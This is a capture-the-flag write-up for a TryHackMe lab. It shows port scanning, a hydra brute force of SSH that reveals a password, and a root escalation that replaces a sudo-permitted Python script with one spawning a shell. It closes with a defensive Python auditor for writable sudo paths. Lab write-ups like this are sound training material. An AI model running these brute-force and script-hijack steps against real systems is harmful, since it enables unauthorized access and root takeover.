Library

Room Link: https://tryhackme.com/room/bsidesgtlibrary

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Nothing in the robots.txt except a hint to use rockyou

We can see a potential username

TCP/22 - SSH

Since I couldn't find anything on the webpage, I tried brute-forcing SSH with the name we had and rockyou.txt for passwords.

Kali

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt $VICTIM -t4 ssh

Kali

ssh meliodas@$VICTIM
Password: iloveyou1

Victim

sudo -l

We can run a Python script with NOPASSWD. After looking at the script, nothing stood out that could be exploited as is, but I did have access to delete the script and put my own in its place.

Victim

cd /home/meliodas/
ls -lah 
rm -f bak.py

Victim

echo "import os" > bak.py
echo 'os.system("/bin/sh")' >> bak.py
sudo /usr/bin/python3 /home/meliodas/bak.py
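
The escalation above works because the sudo rule names a script inside a directory the user controls, so the file can be replaced no matter who owns it. The following is an added example (not part of the original write-up) of an audit that walks every absolute path in a sudo-permitted command and reports components a non-root account could swap out. `audit_path`, `audit_command` and `sample_lstat` are hypothetical names, and the ownership table is constructed for illustration rather than read from the room's VM.

```python
import os
import shlex
import stat
from types import SimpleNamespace

def audit_path(path, lstat=os.lstat, trusted_uids=frozenset({0})):
    """Walk from path up to /, returning (component, reason) pairs wherever an
    untrusted account could modify or replace what sudo will run."""
    findings, current, child = [], os.path.normpath(path), None
    while True:
        try:
            st = lstat(current)
        except OSError:
            st = None
            findings.append((current, "missing"))
        # Symlink mode bits are meaningless; link targets are not followed here.
        if st is not None and not stat.S_ISLNK(st.st_mode):
            # A sticky directory lets only an entry's owner delete or rename it,
            # so a trusted-owned child cannot be swapped out by other users.
            sticky_ok = bool(st.st_mode & stat.S_ISVTX) and child is not None \
                and child.st_uid in trusted_uids
            if st.st_uid not in trusted_uids:
                findings.append((current, f"owned by uid {st.st_uid}"))
            elif st.st_mode & stat.S_IWOTH and not sticky_ok:
                findings.append((current, "world-writable"))
            elif st.st_mode & stat.S_IWGRP and st.st_gid != 0 and not sticky_ok:
                findings.append((current, f"writable by gid {st.st_gid}"))
        parent = os.path.dirname(current)
        if parent == current:
            return findings
        current, child = parent, st

def audit_command(command, **kwargs):
    """Audit every absolute path named in a sudo-permitted command line."""
    return {tok: audit_path(tok, **kwargs)
            for tok in shlex.split(command) if tok.startswith("/")}

# Constructed ownership table: path -> (uid, gid, mode). Assumed values only.
SAMPLE = {
    "/": (0, 0, 0o40755), "/usr": (0, 0, 0o40755), "/usr/bin": (0, 0, 0o40755),
    "/usr/bin/python3": (0, 0, 0o100755), "/home": (0, 0, 0o40755),
    "/home/meliodas": (1000, 1000, 0o40755),
    "/home/meliodas/bak.py": (0, 0, 0o100644),
}

def sample_lstat(path):
    if path not in SAMPLE:
        raise FileNotFoundError(path)
    uid, gid, mode = SAMPLE[path]
    return SimpleNamespace(st_uid=uid, st_gid=gid, st_mode=mode)

if __name__ == "__main__":
    print(audit_command("/usr/bin/python3 /home/meliodas/bak.py", lstat=sample_lstat))
```

On a real host, call `audit_command` without the `lstat` argument so it reads actual ownership; any non-empty result means the script belongs in a root-owned directory instead.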
